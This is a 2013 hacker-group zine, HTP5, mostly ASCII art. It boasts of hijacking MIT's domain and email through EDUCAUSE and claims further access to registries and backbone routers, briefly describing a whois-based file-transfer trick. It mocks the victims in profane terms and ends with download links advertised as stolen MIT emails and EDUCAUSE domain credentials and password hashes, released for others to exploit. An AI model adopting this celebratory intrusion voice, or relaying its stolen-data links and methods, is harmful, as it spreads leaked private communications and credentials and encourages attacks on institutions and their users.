▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄
██████▄▄█▓▓██████████████████▓▓▓██▓▄▄███ > Intro █ █
█████████▓▓██████████████████▓▓▓██▓███▓█ > MIT/EDU ▀▀▀█ █▀▀
███▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█▓█ > Linode █ █
█▓█ ███▀▀▀▀▀███▀██▀▀█▀▀██▀██▀▀▀▀▀███ █▓█ > Nmap █ █▄▄▄▄▄▄▄▄▄
███ ██ ▄▀ ▀▄ ██ █▓▓ ███ █ ▄▀ ▀▄ ▓▓ █▓█ > Sucuri ▀▀▀▀█ █
█▓█ ▓▓ ▀▄ ▄▀ ██ █▓▓ ███ █ ▀▄ ▄▀ ██ █▓█ > NIST NVD █ █▀█ █
█▓█ ███▄▄▄▄▄███▄██▄▄█▄▄██▄██▄▄▄▄▄███ ███ > Wireshark █ █▄█ █
█▓█ ________________________________ █▓█ > Art █ █▄▄▄▄▄▄
█▓█ HTP____________________MWTB_DLTR ███ > Zerodays ▀▀▀▀▀▀▀█ █
██████▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀██████ > Outro █ █▀▀▀▀
█▓▓██ █▀▀████████████████████▀▀█ ██▓▓█ > See reverse for █ █▄▄▄▄
████ ████████████████████▓▓██████ ████ > HTP4 █ █
▀▀▀▀▀▀▀▀
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
█████████████▒████████
▓▒██████▒░█░███░░ ▒███████████▒
███████████ ▓█████████████████████▒
▓████ ▒█████████▒▒░███████████████████████▒
░▒███████░████████▒██ ▒██████████████████████░
▓███████████████▒██ ░█ ░████████████████████████░
████████████████████▒ ███▒█████████████████████████████
░████████▒██████████████████ ▒█████████████████████████▒
███████████▒████████████ ▒ ███████████████████████████▒
▒██████████▒ ░████████████ ▒██▓ ░▒██████████████████████████▒
█████████ ▒███▒ ███████░ ███████████████████████████████████
█████████░██████ █████▒██▓ ▓███████▒▒████████████████████████████
▒██████████████████ ████▒▓▒█▒ █████████████████████████████████████
░████████████████████░▓█░ ░█ ░▓███████████████████████████████████
███████████████████▓ ░ █ ░██████████████████████████████████
████████████████████ █▒ ██░▒███████████████████████████████████
▒███████████████████ ▒ ▒▓███▒▓ ███████████████████████████████████
░██████████████████ █▓▓▓▓█░ █ ████████████░ ░████████████████
██████████████████ ▓███ █░ █████████████▓██████████████████ █
██████████████████ ░░ ▓█ ▒ ███████████████████████████████ ▓
██████████████████░ ▓ █░ █ ███████████████████████████████░
██████████████████ ██ ▒███ ████████████████████████████████▒█
███████████████▒██ █ ░▒▒██ ░▒████████████████████████████ █
███████████████▒▒▒ ███ ████████████████████████████▒ █░
█░ ▓▓██████ ░ ▓█ ████▒ █ ████████████████████████████ █▓
██████▒ ▒█ ▒ █▓ █ ▓████████████████████████████ ▒█▒
▓ ▒▒█▓█▓████ ▒▒██▒ ██ ▒▒▒░█████████████████████████████▓██
███▓ █░ ▒██████░ ░ ░▓███▒ ██████████████████████████████░
██ █▓ ░████▒▒ ██ ▒ ░▒▒▓█▒ █████████████████████████████
░ ▓█▓ ██████▓▒ ███ ██ ██▓█▒▓░ ░██████████████████
▒░ ░███ ████████████▒▒ ▓▓ ▓█░ █ ██████████████████
█▒ ▒██▒ ██████████████ ░ █▒ ▒▒█▒▓ ▒▒▒░██████████████████
██ ██ ▒▓ ███████████████████ ██▒ ▒███▒▓██▓ █ ░████████████
██▓█ █ ███████████████████▒ ███▓ ▓█ █▓ ████████████▓
███ ██████████████████████░▒▒█▒ ▒█ █▒ ██ ██████████▓
█▒█ ████████████████████████ ░░ █▒ ▒ ▓██████████
▒▒█ ███████████████████████ █ █ ▒ ▒▒█████████▓
█▒ ▒███████████████████████▒ █ ██ ██▒ ██ ░███▒ ██
██ █ ▒░ ▓███████████████████ ██ ███▒ ▒ ░██ █▒▒ ▒████░░██ ██
█▓███▒ ██▓▒█████████████░ ██ ▓█░░░░██░ █▒ ▒ ░█░ ▓█░░██░
████▒ █ ▓███████████ ▓███░ █ ▓█ ▒ ▒▓ ███
█████ ███ ████████░ ▒█░ ██ █ ██ ▒▓ ▒ ███ ██
█▓██▓ ██▒ ▒███████▓ █▒ ▓▓ ░███ ██▒▒▒ ▒█░ ███████▒
▒█░▒ ░ ░█░ ███████▒ ░▓ ▒█████▒███▓░ ▒███▒████░ ███████▒
▒█████░░ ░▒ ░███████ ░█▓ ░░███ █ █ █ ██████▓
▒██████ ▒███████████ ░ ▒▒███ ░▓ █ ░ ░█ █████▒
▒███████▒ ███ ▒██████░███▒▒▒█░ ▒ ▓ █░ █ ░████▓
███████ ░█░ ░▒ ▓██████ █ ▒█ █░ ▓██░░█▒▒ ▒████▒
▓███████ ▒█▒ ░██ ▒██ ▒ ███████ ███░████▓██████
/████████ /████████ /██████████████████ /███████████████▄
|▒████████ |████████ |▒██████████████████ |▒█████████████████
|▒████████ |████████ |▒██████████████████ |▒██████▀▀▀▀▀▀█████
|▒█▓▓▓▓▓▓█▄▄▄▄▄█▓▓▓▓▓▓█ |/▒▒▒▒/█▓▓▓▓▓▓█▒▒▒▒/ |▒█▓▓▓▓▓ |▓▓▓██
|▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▓▓▓▓▓▓█ |▒█▓▓▓▓▓ |▓▓▓██
|▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▒▒▒▒▒▒█ |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓██
|▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒██
|▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█░░░░░░█ |▒█▒▒▒▒▒█▀▀▀▀▀▀▀▀▀
|▒█░░░░░░█▀▀▀▀▒█░░░░░░█ |▒█░░░░░░█ |▒█░░░░░█
|▒█░░░░░░█ |▒█░░░░░░█ |▒█ █ |▒█░░░░░█
|▒█ █ |▒█ █ |▒█▄▄▄▄▄▄█ |▒█ █
|▒█▄▄▄▄▄▄█ |▒█▄▄▄▄▄▄█ |/▒▒▒▒▒▒▒/ |▒█▄▄▄▄▄█
|/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒/ ░ ░░▒ ZINE 5
htphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtpht
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
NORTH KOREA OF THE INTERNET SINCE 2011
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
So its been 182 days since our last zine, since then our dedicated team
of researchers, philanthropists, playboys and troublemakers have been
busy at work scouring the Internet for high quality entertainment at the
expense of everybody who isn't us.
5/1 also marks the day HTP was founded, which means we've had two
glorious years of being the best and owning the rest. Today we will be
drinking 40s, listening to some balla tunes, and circlejerking over the
inevitable confusion, awe, bitterness and jokes that will ensue from
this release. :)
Due to the immense size of HTP5, this zine is unfortunately not self
extracting. However do not fret, this zine is full HD and 4D ready.
We've divided everything into its own section just to keep things sane.
So go get the popcorn ready and strap in for a long and wild ride. This
zine is a tale of trust, betrayal, brotherhood, rampant paranoia,
hilariously shoddy police work (More on that later), and the plight of
the whitehat sheep being fleeced at will by their blackhat shepherds.
It's really only missing a tacked on love story, a few good car chases,
and an explosion at the end, but it might not be too late for all of that.
▀ ▄
█▄▄
▄____ ░ █▄
▄ ▄███▀▀ \;',`'-,▓█░
▓██▀-;_,; ':-;_,'.█▓░
▓▓██; '/ , _`.-\█▓
░▓███▄'`. (` /` ` \`|█
░ ▓▓▓ █|██ `\`-. \_ / |▓
░█▓▓█▓░░ | █▓ ( `, .`\ ;'|░
░▓▓█░ ░░ \ ░ ▓░░ .' `-'/▀
▄▄▓▓▄▄▄▄▄▄▄▄▄▄▄▄▓▄▄▓▓▓░ .'▀
░██▓▀ ▀█████████████████▄.-'`
███░ ███▀▀███▀▀███ ███
█████████ ███ ███▄▄███ 2013 ▒ ░
█████████ ███ ██████▀
███ ███ ███ ███
▄███▄ ▄███▄ ███ ▄███▄
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
▄
░████▓██▓██▓▒▒▒░
░▒██████▓▓███████▒████▒░░░░
░▓████████████████▒██▓████▒▒░░ ░░ ░░░░
░▒▓████████████████████████▓▓██▒█▓▒▓▒▒▓█░░ ░░
▒████████████████████████████████▓▓▓██████▓ ▒ ░░
█▓▓███████████████████████████████████████▓▓▓ ░ ░ ░▒
░▓▓█▓███████████████████████████████████████████░ ▒ ░ ▒░
▒▓▓▓▓▓▓▓█████████████████████████████████████████▓▓░░▒ ░
░▒▓▓▒▓▓██████████████████████████████████████████████▓▒ ░░ ░ ░
░▒▒▒▓▓▓▓▓▓▓▓▓▓▓███████████████████████████████████████▓▓█▒ ░ ░░
░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████▓▓▓▒ ▒░
░▒█▓█▓█▓▓▓▓▓▓█▓▓▓▓▓▓█████████████████████████████████████████▒█ ▒░
░▓▓▓▓▓▓▓▒█▓▒▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████░█▓ ░ ▒
░██▓▓▓▓█▓▓▓▓█▒▓▓▓▓▓▓▓▓▓▓▓██████▓████████████████████████████████▓██▓█░░
▒▓█▓▓▓▓▓█▓█▓▒░▒░█▓▓▓▓▓▓▓▓▓▓██████████████████████████████████████▓███▓▒▒
▒█▓▓▓▓▒▓█░░▓▓▓░██▒▓▓▓▓▓▓▓▓▓▓▓████▓██████████████████████████████████▓██▓▓
▓▓▓██▓▒▓▓▓█▒░▓▒▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████████
█▓█▓▓▒▓▒▓▓▓▒░▒▓▓▓▓░░▓▒▓▓▓▓▓▓▓▓█████████████████████████████████████████▓▓▓
░▓▓▓▓▒▓▒▓█▓▓▒░░▓▓▓▓▓▒▒▓▓▒▓▓▓▓▓███▓▓████████████████████████████████████████
░▒░█░▒▒░▒▓▓▓▒▒░░░▓█▓▓▓▒▓▓▒▒▒▓▓▓██▓▓████████████████████████████████████████
░░ ░ ░ ░▒▓▒▒▒▒░▒░▓▓▓▓▓▓▓▒▓▓▒▒▓█████████████████████████████████████████████
▒▓░ ░░░░▒▓▓░▒░▒▓░░░▒▓▓▓▓▓▓▓▓▓▓██████████████████████████████████████████████
██▒▒░░▒░▒▓▓░▒▒▒▒▒░░▒▒▓▓▓▓▓▓▒▓█▓█████████████████████████████████████████████
██▓▒▒▒▒░▒▒▓░██▒▓▓▒▒▒░▓▓▓▒▒▓▓████████████████████████████████████████████████
████▓▓▓▓░▓▓░▓▓█▓▓▒▒▒░░▒█▒▒▓█████████████████████████████████████████████████
█▓█▓▒▓██░█▓░▒▓█▓▓▓▒▒▒▒▒██▓██████████████████████████████████████████████████
▓█▒░░▓▒▒▓▓▒░░░▒▒▒▓▓▓█▓██████████████████████████████████████████████████████
▒█▒░ ▓ ░▒▒░ ░ ░░░░▒░░▒▓█▓█████████████████████████████████████████████████
░█▒░ ░ ░░░░▒█▓███████████████████████████▓▒░▒▒▒▓█████████████
░░ ░░░░░░▒█████████████████████████▓▒▓▓▓▓▓▓▓▒▓███████████
░ ░░░░░░░░░▓███████████████████████▒▓██▓▒░░▒▒▒▒██████████
░ ░░░░░░░░░░░▓▓████████████████████████▓▒░░░░▒░░▓█████████
░ ░░░░▒▓▓▒░░░░░░░░░░░░▒░█████████████████████▓▓▓░ ░░░▒░▒█████████
░░░░ ░▒▓▒ ░▒▒▓▓▒░░░░░░░░▓▒███████████████████████▓██▒▒░░▒░▓████████
░░ ░██▓▓▓▒░░ ░░░░░░░░░░░░░░░▒▓▓██████████████████████▓▓▒▒░░▒░██████▓▓▓
░ ░▒▒▓▓▓░▒░░░▒▒░░░░░░ ░ ░░░░▒█████████████████████▓▓▓▒░░░▒▒██▓██▓▓▓▓
░ ░▒▒▒░ ░░▒▒░░ ░░░░░▓███████████████████▓██▓█▒░▒░███▓█▓▓▓▓▓
░░░░░ ░▒▒░░ ░░░░░░▒████████████████████▓▓▒▒▒░▓▓████▓▓▓██
░░░ ░▒▒░░ ░░░░░░▒▒▓█████████████████▓▓▓▓▒░▓███████▓▓▓█
░░ ░░░░░▒▒▒▒▒██████████████▓▓▓▓▒▒▒▓██████▓▓▓▓▓▓
░░ ░░░░░░▒▒▒▒▒▓█████████████▓▓▓▓▒▒▓██▓██████▓██▓
░░ ░░░░░░▒▒▒▒▒▒▒██████▓██▓██▓▓▓▓▓▓▓▓▓▓▓▓███▓█▓▓▓▓
░░░ ░░░░░░▒▒▒▒▒▒▒▒▒█████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓███▓▓█▓▓▓▓
░░ ░░░░░░░▒▒░▒▒▒▒▒▒▓████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓███▓▓▓
░ ░░░░░ ░░░░░░▒░▒▒▒▒░▒▒▒▒▒▓███▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓
░░ ░▒░░░░░ ░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██▓▓▓▓█▓
░░░░░ ░░▒▒░ ░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓█▓▓▓▓▓▓▓▓▓▓▓▓▓███▓▓▓█▓▓
░▓▒▒▒▒▒▓░ ░░░░░░░░░░░░░░▒░▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██▓▓▓▒░░
▒░░░ ░░░░░░░░░░░░░░░░░░▒░░▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒░░
░ ░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓█▓▓▓▒▒░░
░ ░░░░░░░░░░░░░░░░░▒░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓░░
░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓█▓▓▓▒
░▒▒▒▒▒▒▒▓▓▒░ ░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒░
░▒▒ ░░░ ░░░░░░░░░░░░░░░▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▒▒▒▓▓▓▓▓▓▓▓▓▓▒░░
░ ░░░░░ ░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓░░
░▒▒▓▓▒░░ ░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒░░░▒▒▓▓▓▓▓▓█▓▓▓▓▒
░░░▒▒░░░ ░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒░░░░░░▒▒▓▓▓▓▓▓▓▓█▒▒░
░ ░░░▒▒▒░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒░░░░░░░░░▒▒▓▓▓▓▓▓▓▓▓▒░
░ ░░▒▒▒▒▒▒▒▒▒▒░▒▒▒▒▒▒▓▓▓▒░░░░░░░░░░▒▒▓▓▓▓▓▓▓▓▓▓░
░ ░░▒▒▒▒▒▒▒▒▒▒░░░░▒▓▓▓▓▒▒░░░░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓░
░ ░░░▒▒▒▒▒▒▒▒▒░ ░▒▓▓▓▓▒▒░░░░░░░░░░░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▒▒
░░ ░▒▒▒▒▒▒▒▒░░ ░▒▓▒▒░░░░░░░░░░░░░░▒▒▒▒▒▒▓▓▓▓▓▓█▓▒▓
░░░▒▒▒▒▒░░░ ░▒▒░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▒███
░ ░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▒█▓███
░ ░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒███████
░ ░░░░░░░░░░░░░░░░▒▒▒▒░▒▓▒▒▒▓▓▒
░ ░░░░░░░░░░░░░░▒░▒█▓▒▓▓▒▒▒▒
░ ░░░░░░░░░░▒░░▓▒▓▓▓▓▓▒▒▒▒
░ ░░░░░░░▒▒▓█▓██▓▓▓▓▒▓
░ ░▒▒▓▓▓▓▓█▓▓▓▓▓▓▓
▒ ░▒▓▓▓▓▓█▓▓▓▓▓▓▓▒▒
▒▒██ ░░▒▒██▓▒▒▒▒▒▒▒▒▓▓▒▒▒
░▒█▓██▒ ░░▒▓▓▓▓▒▒▓▓▒▓▒▒▒░░░░░
▓███▓██ ░░░▓▒▒▒▒▓▒░▒▓▓▓▓▓▓▓████
░░█████▓▒ ▒▓▓▓░░░░▒▒▓██▒░░░░▓▒▒▒░░░░▓▓▓
░▒▓▒██▒▓░ ░░░░▒░░░░░▒▓▓▓█▒▒░░░▒▓▒▒▒▒░░░░▒▒▒
░█████▒█░░░░░░░░░▒ ░▓██▓▒▒░░░▒▓█▓▓▒▒░░░░░░░░
░ ███▒███▓░░░░░░░░▒░░▓█▓▓░░░░░▒▓▓▓▓▒░░░░░░░▒▓▓
▓█▒█████░░░░░░░░▓░ ███▒░░░░░░░▓▓▒▒░░░░▒▒░▒▒░░
░▒█████▒░░░░░░░▒▒▓▒█▓▒▒░░ ░▒▒▒▒▒▒▒▒▒░░░▒▒▒▓▓▒▒
▒▓██████░░░░░░░▓▒░▓█░░▒▓▒░░░░▒▒▓▓▒░▒░░░░▒▓▒▒▓█▓
███████░░░░░░░░▒▓░▒░▒▓▒░▒░░░▒▒▒▒▓▒▒░ ░░░░░▒▓▓░░
███████░░░░░ ░░░▒▒█░░░░░▒░░▒▒▒▒░▒▓▒░░░░░░░░ ▓░▒▒
▒▒█████░░░░░ ░░░░▒█▓▒ ░▒▒▒▒░▒▒▓░░░▓▓▒░░░░░▒░▒░░░░
▒▒█▒█▒▓░░░░░░░░░░▒██▒██░░░██▒░▒░▒▒▒▒▒░░░░▒▒▓▒▒█▒██
░█▒████░░░░░░░░░░░▓█▒████░░▒▒█▒░░▒▒▒▒▒▒▒▒░░▒░░░▒█▒░
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
"What's the score?"
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
██ ██ ██ ██ █████ HTP5
██ ██ ██ ▄▄ ▄▄
██ ▀▀ ██ ██ ██ FEATURING EDUCAUSE
▄██▄▄▄▄██▄▄██▄▄██▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
Back in January we decided to upstage Anonymous (again) and have a little fun
with MIT. After their circa 2000 deface on mit.edu, we decided to up the ante.
In doing so, we knew we had to make it very clear that it was an anti-Anonymous
deface (A mirror of it can be found here: straylig.ht/files/mit/mit.html). Thus
why it made reference to Sabu, grand wizard of LulzSec, and "DOWN WITH
ANONYMOUS." Despite all this, some of the cluebags in the media apparently
thought that by "DOWN WITH ANONYMOUS," we meant "we b down wit da lol anonimuss
leejun y0!" Additionally, almost everybody missed the fact that it was a troll
deface, which just proves that it will be a few decades before we reach October
1st, 1993.
MIT's reaction was particularly lulzy. They did a better job of reporting the
facts than all the media outlets, but they couldn't decide whether the e-mail
got intercepted or not. First, there was this from
http://tech.mit.edu/V132/N62/hack.html:
"Unlike previous attacks, which temporarily disabled some services, this attack
had the potential to be much more severe. A more calculated hacker could have
intercepted email messages intended for anyone at the MIT.edu domain, including
all alumni who use alum.mit.edu email addresses."
After having a day to do a better post-mortem, MIT started freaking out. They
published this: http://tech.mit.edu/V132/N63/hack.html. From that link:
"Unlike previous attacks, which temporarily disabled some services, this attack
had the potential to be much more severe. Email was specifically affected. Mail
is normally received by one of nine different MIT servers; however today, mail
that was sent between 11:58 a.m. and 1:05 p.m. was directed to a machine at
KAIST, Korea Advanced Institute of Science and Technology, meaning the
attackers had complete control of emails successfully sent during that time."
We don't know the percentage either, but we know 5.1 GB of uncompressed e-mail
when we see it :P. So who owned the domain? Well :
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
Domain Name: MIT.EDU
Registrant:
Massachusetts Institute of Technology
Cambridge, MA 02139
UNITED STATES
Administrative Contact:
I got owned
Massachusetts Institute of Technology
MIT Room W92-167, 77 Massachusetts Avenue
Cambridge, MA 02139-4307
UNITED STATES
(617) 324-1337
cunt@mit.edu
Technical Contact:
OWNED NETWORK OPERATIONS
ROOT
US
DESTROYED, MA 02139-4307
UNITED STATES
(617) 253-1337
owned@mit.edu
Name Servers:
FRED.NS.CLOUDFLARE.COM
KATE.NS.CLOUDFLARE.COM
Domain record activated: 23-May-1985
Domain record last updated: 22-Jan-2013
Domain expires: 31-Jul-2013
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
Here's the cherry on top:
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
From: "CloudFlare Support" <support@cloudflare.com>
Subject: [CloudFlare Support] Pending request: Why is cloudflare staff
modifying my dns records? (ticket #12053)
Date: Wed, January 23, 2013 4:48 pm
To: "Fuckmit" <fuckmit@tormail.org>
##- Please type your reply above this line -##
[CloudFlare Support] Pending request: Why is cloudflare staff modifying my dns
records? (ticket #12053)
This is an email to remind you that your request (#12053) is pending and awaits
your feedback.
Please click the link below to review and update your request:
http://support.cloudflare.com/tickets/12053
----------------------------------------------
Justin, Jan 22 11:48 am (PST)
Hi,
We have reason to believe you are not the actual owner of the mit.edu domain.
We have been in contact with the actual owner this morning.
As such we have taken steps to secure the account, and the domain has already
been returned to the actual owner.
----------------------------------------------
Fuckmit, Jan 22 11:45 am (PST)
Two questions:
Why is cloudflare staff modifying my dns records without authorization?
Why is cloudflare staff repeatedly regenerating my API key every time they
decide to modify my dns records without authorization?
--------------------------------
This email is a service from CloudFlare Support
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
You have reason to believe a user named 'Fuckmit' is not the legitimate owner
of mit.edu? Excellent deduction, Justin.
Soon after, we decided to troll Gizmodo and the rest of the media into
preserving our access. The 'browser exploit' on MIT's NOC
( http://gizmodo.com/5978039/hackers-incoherently-deface-entire-mit-website )
never existed. We'd never show our full hand at once, we'd just lose access.
MIT certainly believed us though, despite their own reassurances otherwise. For
confirmation, they contacted the root registrar for EDU domains (EDUCAUSE)
after finally asserting that we got access to their EDUCAUSE account.
EDUCAUSE then made the fatal mistake of overlooking our complete access into
the EDU TLD. Though, we can't say we expect much from a registrar running ASPX
on their backend.
Now, just in case you don't believe us, we have entrusted the login credentials
of nearly every EDU domain to hackers worldwide (active as we speak) within the
MIT section of this zine. So, let's see what happens first, mass exploitation
or whitehat response? ;) We are not ones for defacing, actually, and we're
going to leave that up to the Internet Justice League (AKA Anonymous) if they
can even get to it on time. And we figure they'll manifest some statement
about how its morally justifiable to deface *.edu. We frankly don't care.
By the end of today (5/6), EDU operation should return to normal.
Moreover, we particularly enjoyed the fact that the first nameserver for
root-servers.org is an EDU domain. This effectively gave us control over
root-servers.org. However, ICANN is responsible for the root zones file.
ICANN was already compromised by that time, though, joined by several of the
major RIR's (RIPE, LACNIC, etc.) along with bgp+shell access and 13,000+
backbone AS's (some of which persists to this day) & the InterNIC. Surprisingly,
they used passwordless private keys stored on their servers to ssh into the
internal Juniper routers as superusers: only 3 networks away and not even phys
sep. Nothing proxychains can't handle. They probably should've checked their
netscreens before it was too late. :P
None of this access was ever used, but we did get to see some pretty funny
shit. In the backbone of SourceForge (Savvis), for example, we ran into some
old SunOS Sparc boxes with 1900+ day uptime. They had passwordless private key
auth, and the kernels were fairly ancient (and in the absence of all file
transfer utils, `whois` coupled with a few pipes worked great to transfer tgz's
served from port 43 - no file editing required). As it turns out, we were not
the first ones there. On their Phoenix, AZ stats server, some random hacker was
kicking back in /var/tmp/.access_logx/ with a psyBNC connected to Undernet. On
SourceForge's backbone -- LOL? We don't think he fully realized what he had
breached. Or maybe he just really needed a psyBNC server. Either way, he'll
probably have to end up getting a new psyBNC after today. On Github or
something.
Enjoy the MIT emails/EDUCAUSE login data, included in this segment of
HTP5:
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/mit.zip
|- 2.6GB | Zip compressed MIT emails
~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/EDUDOMAINS.rpt
|- 28MB | EDUCAUSE database: extracted domain credentials
~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/EDUCAUSE-MISCDBS.zip
|- 12MB | EDUCAUSE misc. databases extracted from 6.4GB MSSQL tape backup
~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/eduhashindex.txt
|- 143K | EDUCAUSE domain passwords, allow account/DNS modification.
| | For use with /HTP-5/MIT-EDUCAUSE/EDUDOMAINS.rpt
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄ ▀▄▄▒▒▒▒▒▒▒▒▒▒▒▒▒░ ░▒▒▒▒▒▒▒▒▒░░ ▒▒▒▒▒▒▒▒▒▒▒▒░ ▒▒▒▒▒▒▒▒▒▒░ ░░░░░ ░░ ░ ░░
